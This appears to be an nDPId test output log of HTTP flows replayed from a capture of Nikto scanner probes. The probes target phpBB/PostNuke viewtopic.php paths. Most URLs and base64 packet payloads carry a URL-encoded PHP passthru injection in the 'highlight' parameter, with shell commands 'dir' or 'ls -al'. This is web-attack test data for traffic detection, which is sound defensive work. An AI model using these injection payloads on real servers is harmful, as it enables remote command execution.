-00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} -01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 